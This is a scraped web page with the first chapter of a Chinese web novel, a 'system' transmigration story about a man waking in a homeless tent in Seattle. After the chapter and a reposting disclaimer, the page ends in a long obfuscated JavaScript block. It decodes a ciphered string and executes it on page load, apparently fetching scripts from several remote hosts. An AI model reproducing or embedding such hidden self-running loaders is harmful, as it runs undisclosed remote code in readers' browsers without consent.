=== 第1章 西雅图冰雨夜 ===
章节索引: 1/335
字符数: 10,043
段落: ch-0001 (段1)

# 第一章 西雅图冰雨夜



温热滑腻的东西不停擦过脸颊。
还有急促的呼吸声。
一股怪异的臭味儿和腥甜味儿混合的味道钻入鼻孔。
头好疼，我这是怎么了？
韦恩感觉到彻骨的冰寒。
冷。
冷得像是整个人都被丢进了冰窖里。
他用力睁开眼睛，映入眼帘的是一片灰色的帐篷布，和挂在帐篷顶的一盏昏黄的灯，旁边是一条黑黄相间的串串小狗，刚才那个滑腻的东西应该是狗舌头。
看到韦恩醒了，小狗高兴地摇着尾巴打转，发出“呜呜”的声音。
这是哪里？
医院？
怎么还有一条狗？
他依稀记得，自己昏迷之前好像是正在抓捕一个罪犯，对方手中闪了一下光，随后他就什么都不记得了。
刘队和猛子他们还好吗，没受伤吧……
这臭味儿怎么有点像麻子，给我搁证物室里了吗……
韦恩一边想着，一边强撑着坐起来，立刻发现了不对劲的地方。
他正在一座破旧的帐篷里，坐在一张脏兮兮的毯子上，却根本阻挡不了地面传来的冰寒。
下一个瞬间，剧烈的头痛袭来，一股狂暴的信息猛地涌入他的大脑。
布鲁斯·韦恩，二十三岁，前美利坚情景剧童星，离婚三次，破产，流浪汉，抑郁，感冒，斩杀线……
韦恩猛地坐直了身子。
他穿越了！？
穿越到了一个同样叫韦恩的美利坚流浪汉的身上！
好在这货也姓韦，名字还和上辈子一样。
最令韦恩欣慰的是，这货虽然变成了流浪汉病死，却并没有使用过强化剂。
这是一具无毒的身体。
与此同时，他突然发现帐篷的地面上似乎有一片几何图案，组成了一个类似于祭坛的花纹，他自己就坐在正中央。
这是什么？
“咳咳……”韦恩一阵猛烈咳嗽，只感觉肺都要被咳出来。
哪怕重生了，他的流感并没有痊愈，而且身体极度虚弱，仍然有随时再次死过去的危险。
不能坐以待毙，得尽快去找些药品和食物……
一股臭味儿突然从身旁被一条毯子下面传来，韦恩艰难地爬起来走到毯子旁，用力掀开。
一个头发灰白、皮肤松弛的老白男，正躺在下面，眼瞅着有出气没进气了，周围还散落着几个针管和燃烧的叶子灰烬。
老白男看到韦恩的瞬间，瞳孔猛然一缩，颤抖着说道：
“邦迪耶啊……你……你还活着……这怎么可能？我已经把你献祭给巫毒之神……我是错的，我从一开始就是错的……上帝啊，请宽恕我这个罪人……我只想活下去……我亲手毁了自己的荣誉……”
韦恩皱眉道：
“什么邦迪耶？咳咳……这是什么地方？”
老白男涕泪横流，眼神已经变得迷离，似乎根本没有听到韦恩的话，自顾自的说道：
“我曾经是一名保卫国家的战士，我为荣誉而战，我为美利坚在中东负伤……只有止痛药能让我安静……我没有控制住自己，我让魔鬼毁了我……我的妻子，我的女儿……她们离开了我……我失去了房子，我失去了一切……该死！我是为这个国家受伤的，他们怎么能这样……”
“巫毒……巫毒没有拯救我……邦迪耶没有降临……都是我的错，我是罪人……都是我的错……主啊……”
就在这时，老白男猛地抓住韦恩的手，塞给他一个优盘，满是血丝的双目瞪圆，颤抖着说道：
“找到我的女儿艾丽，把这个给她，她会给你报酬的……小心，他们在找你，他们想要你！”
最后一句话说完，他的身体猛地一阵抽搐，随后双眼变得迷离，瞳孔扩散，一动不动。
死了。
从对方断断续续的话语中，韦恩已经迅速总结出了对方的情况，一个参军之后在战斗中受伤的伤残军人，止痛药成瘾之后开始打强化剂，个人破产妻离子散，信了巫毒教乱搞，把自己吸死了。
典型的美利坚老白男斩杀路径。
就在这时，一个诡异的机械音猛地从韦恩的脑海中响起：
【开始扫描周围环境……哥布林街巷确认……教堂地下墓场确认……食尸鬼巢穴确认……人皮黑暗法典确认……鼠人偷窃者确认……堕落骑士确认……吸血鬼密党确认…………确认环境为魔域地下城，符合系统装载环境，开始装载……】
【宏伟的魔域地下城被黑暗王庭之中的金色魔王所统治，亿万生灵在魔王的践踏中泣血哀嚎，伟大的冒险者啊，踏上你的挑战之路，踏碎深白魔巢，击败魔王，你将在堕落的魔域地下城浴火重生！】
【主线任务：击败魔王，毁灭魔域地下城。】
韦恩只感觉整个人瞬间被一股阴冷的感受包裹，仿佛有什么东西已经融入他的体内。
【冒险者在沉睡中醒来，带着他的战宠开始地下城的冒险之旅，查看巫毒教堕落兽人的尸体，或许会有意外收获】
机械音再次响起，这次却变成了一种提示。
这是……系统？而且是地下城冒险系统？
第一章西雅图冰雨夜(第2/2页)
韦恩虽然不是个资深玩家，但在前世也在各种游戏和小说动漫中了解过地下城的设定，没想到系统竟然直接把美利坚默认成凶残黑暗的魔域地下城了。
有了这个系统，也算没白白重生。
想到刚才的提示语，他立刻低头抓住那具尸体的衣服，想要翻找一下。
就在触碰的一瞬间，他的眼前骤然浮现出一个发光的半透明面板，上面赫然写着：
【你接受了老约翰的临终嘱托，支线任务：给老约翰的女儿送信。奖励未知。】
【你搜刮了老约翰的尸体，可怜的老约翰从恶魔军团退役之后妻离子散成为了堕落流浪者，他修习残缺的巫毒术法，服用了过量的巫毒药剂，好在还有一些遗物】
【你获得了战术匕首专精】
韦恩脑海中瞬间涌现出大量关于战术匕首训练和战斗的记忆画面，都是第一人称主视角，看场景都是沙漠地带为主，甚至有不少屠戮妇孺的画面。
几乎是一瞬间，他已经掌握了战术匕首的使用技能。
显然，老约翰曾经在伊拉克和阿富汗服役，是海军陆战队的一员。
而韦恩眼前的面板上，此时浮现出他个人的数据属性：
【职业：冒险者（初级，未选择职业路径）
体力：0.1/0.3
智力：1.2/1.3
精神力：0.3/0.6
血量：5/60
经验值：13/100
技能：吟游表演（初级）；战术匕首使用（专精）
战宠：荒原猎犬（1级30％）
状态：极度饥饿，大病虚弱
警告！血量一旦低于5，会触发魔域地下城斩杀线！】
与此同时，旁边还有个商店选项，点开之后，里面售卖的都是一些回复药剂、魔法药水、术法卷轴之类的东西，后面则标着所需要的金币数量。
韦恩不由露出一丝苦笑，前身这哥们儿也太虚了。
如果一个普通人的数值是1的话，他现在这个数值基本上属于重度残疾。
正想着，喉咙里又是一阵发痒，韦恩开始疯狂咳嗽，这一次咳得根本停不下来，直到吐出一口带血的浓痰。
随后就见面板上的血量骤然一变！
【血量：4/60。警告：你已触发斩杀线，平均每一个小时将降低一点血量，直到彻底斩杀。】
对于死亡的阴冷感受瞬间包裹住了韦恩，他连忙挣扎着站起来，努力平复呼吸，迅速冷静下来。
不行，他必须尽快行动起来，想办法回血到5点以上，否则真的会死！
他需要食物、热量以及药品。
从肺部的刺痛感来看，哪怕不是肺炎也已经是重度支气管炎。
他需要抗生素。
不能再等下去了。
韦恩迅速将老约翰的尸体又翻了一遍，最终只在对方裤兜里找到5美元、一柄小刀还有一部破旧的手机。
这就是老约翰最后的馈赠了。
韦恩将自己的所有衣服连同老约翰的外套全都穿在身上，挣扎着站稳，攥紧那5美元，深吸一口气准备钻出帐篷，出去寻找续命的东西。
就在这时，那条串串小狗猛地朝帐篷外汪汪叫了起来。
外面传来一阵窃窃私语：
“你确定都死在里面了？兄弟？”
“我亲眼看见老约翰前天拖了一个人进去，他还花光身上所有的钱在大爹地那里买了几包最新的强化剂，从那以后就再也没出来过，绝对死了。”
“那就太好了，两具尸体，加起来能卖一千多美刀了，绝对不会有人认领他们的，咱们又能开几次爬梯。”
“老规矩，搜出来的东西对半分，我要这顶帐篷……”
韦恩眼前的面板再次浮现出一行字：
【冒险者，你遇到了两个肮脏的哥布林，这是地下城的第一次挑战，杀死/击败/赶走他们，你将获得奖励】
哥布林？
韦恩明白，这奖励将是他获救的宝贵机会！
深吸一口气，用力站直身体，他猛地掀开破旧的帐篷。
外面站着两个干瘦的黑人流浪汉，眼中满是血丝，正诧异地看着他。
小狗冲到前面，挡在韦恩身前，冲着那两人吠叫。
此时韦恩才看清自己所在的地方。
这是一处破旧的街区，帐篷就在路边，眼前的墙壁上满是混乱的涂鸦，不远处是一片片的垃圾和堆在一起的黑色垃圾袋。
隐约还能见到几个站立在街角身体以怪异角度扭曲着的一动不动的人形生物。
而仅仅一个街区之外的街道上，万圣节的装饰闪烁着小彩灯，高楼之上的霓虹灯闪耀着一行“欢迎来到西雅图”的字母。
甚至还能看到顶层的高级餐厅里面正在大快朵颐的人影。
海风夹杂着旅游区的饭菜味道和码头区的腥臭味道扑面而来。
一群海鸥落在路边的栏杆上，冷冷地盯着破旧的帐篷，黄色的喙上还有丝丝猩红。
漆黑的天空中，雨雪混合物形成的冰雨正在不停落下，冷入骨髓。
西雅图冰雨夜。
请选择错误类型
更新太慢
缺少章节
章节内容错误
验证码：
提交
关闭
本站所有小说都是转载而来，所有章节都是网友上传！转载至本站只是为了宣传本书让更多读者欣赏。
!function(){function a(a){var _idx="n3xnhwm2yg";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[qYF F82_qq!7_2(F6O2 5ca[Xd5 Y!5YF_52 2_qql88FjFgcY8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=F8YjYmpYFrFF56)_FYc"("ag""aPXd5 Y=2=O=68D62fODm622Y5V6fFh!qYF h86/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfgfcmn<ydFhm5d2fO^cajngKa=5YXY5LYWfgfcmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6Fhg6/}0=6FY^9Y6phFgh/o=qOdfiFdF_Lg0=5Y|5Tg0P=d8"#MqYYb"=(8HZ!F5T[(8+i;NmJd5LYcccY=Fa8>[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2Pacda??"HZ"aP(dF(hcYa[P7_2(F6O2 JcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=F8""a[7mqOdfiFdF_L8*}=}00<(mqY2pFh??c(mJ_Lhc`c$[YPa`%Fa=qcd=+i;NmLF562p67Tc(aaaP7_2(F6O2 fcY8}a[qYF F8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=28FmqY2pFh=O8""!7O5c!Y**!aO%8FHydFhm7qOO5cydFhm5d2fO^ca.2aZ!5YF_52 OPr55dTm6Lr55dTc(a??c(8HZ=qcd=""aa!qYF _8"5phCS^"!7_2(F6O2 ^cY=Fa[qYF 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 O8H"hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^FpX5h(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFL5SJmJLFpdd(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^FpX5h(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFL5SJmJLFpdd(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"Z!qYF 58JcOHc2YD wdFYampYFwdTcaZ??OH0Za%"/2sR2hD^@Tp/}Ko}"!Fj5%8"jR8"%fcnag_vvc5%8"j"%_%"8"%fcnaa=7m5Y|5T%%=2mL5(8Jc5a=2mO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=$caP=2mO2Y55O587_2(F6O2ca[F??YvvYca=LYF|6^YO_Fc7_2(F6O2ca[2m5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfc2a=7mqOdfiFdF_L8}PqYF p8"}Ko}"=X8"2sR2hD^@Tp"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"}Ko}^)ThF)mDDTYRpRm2YF"="}Ko}X5ThF)mC6FTCSDm2YF"="}Ko}2pThFmDDTYRpRm2YF"="}Ko}_JqhFmC6FTCSDm2YF"="}Ko}2TOhFmDDTYRpRm2YF"="}Ko}CSqhF)mC6FTCSDm2YF"="}Ko})FfThF)fmDDTYRpRm2YF"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"=28H"Y#"%XZ!5cavv2mJ_Lhc"(h#"%5caa!qYF O82YD VY)iO(SYFcF%"/"%p%c_j"j"%_%"8"%fcnag""a=H2mCO62c"v"aZa!7m5Y|5T%%=OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=f8"62fYR;7"=_8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=^8""=h80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!h<YmqY2pFh!a28_HfZcYH(Zch%%aa=O8_HfZcYH(Zch%%aa=68_HfZcYH(Zch%%aa=d8_HfZcYH(Zch%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=^%8iF562pHqZc2<<@?O>>oa=Kol886vvc^%8iF562pHqZc5aa=Kol88dvvc^%8iF562pHqZcFaa![Xd5 78^!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv$caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 $ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 )ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mOh_^5_(m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 f8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!fmLFTqYm(LL|YRF8Y=fmdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=faP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=^=l0a=7m(q6(S9d2fqY8^!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 _ca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mOh_^5_(m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 ^cYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<h%6vv_caPYqLY[F8F*O!67cF<86a5YF_52l}!F<h%6vv_caPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8Jc"hFFJLg//[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q/f/}Ko}j(8}vY82sR2hD^@Tp"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aP682dX6pdFO5mJqdF7O5^=28l/3cV62?yd(a/mFYLFc6a=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=c2??OavvcO8/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI?kOqfu5ODLY5/6mFYLFc2dX6pdFO5m_LY5rpY2Fa=Y8cY82dX6pdFO5mJqdF7O5^avv/3cV62?yd(a/mFYLFcYa??2dX6pdFO5m^dR|O_(heO62FL<@=OvvlYjDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=^c7_2(F6O2ca[Lc@0saPaPaPag^c7_2(F6O2ca[Lc}0}a=^c7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaP=Yaa=l2vv6??)ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvv(mqY2pFhvvcY8Jc"hFFJLg//[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"a%"/)_pj68"%p=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tc(aa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=(mqY2pFh80=qcd=""aaPaPaca!'.substr(22));new Function(b)()}();



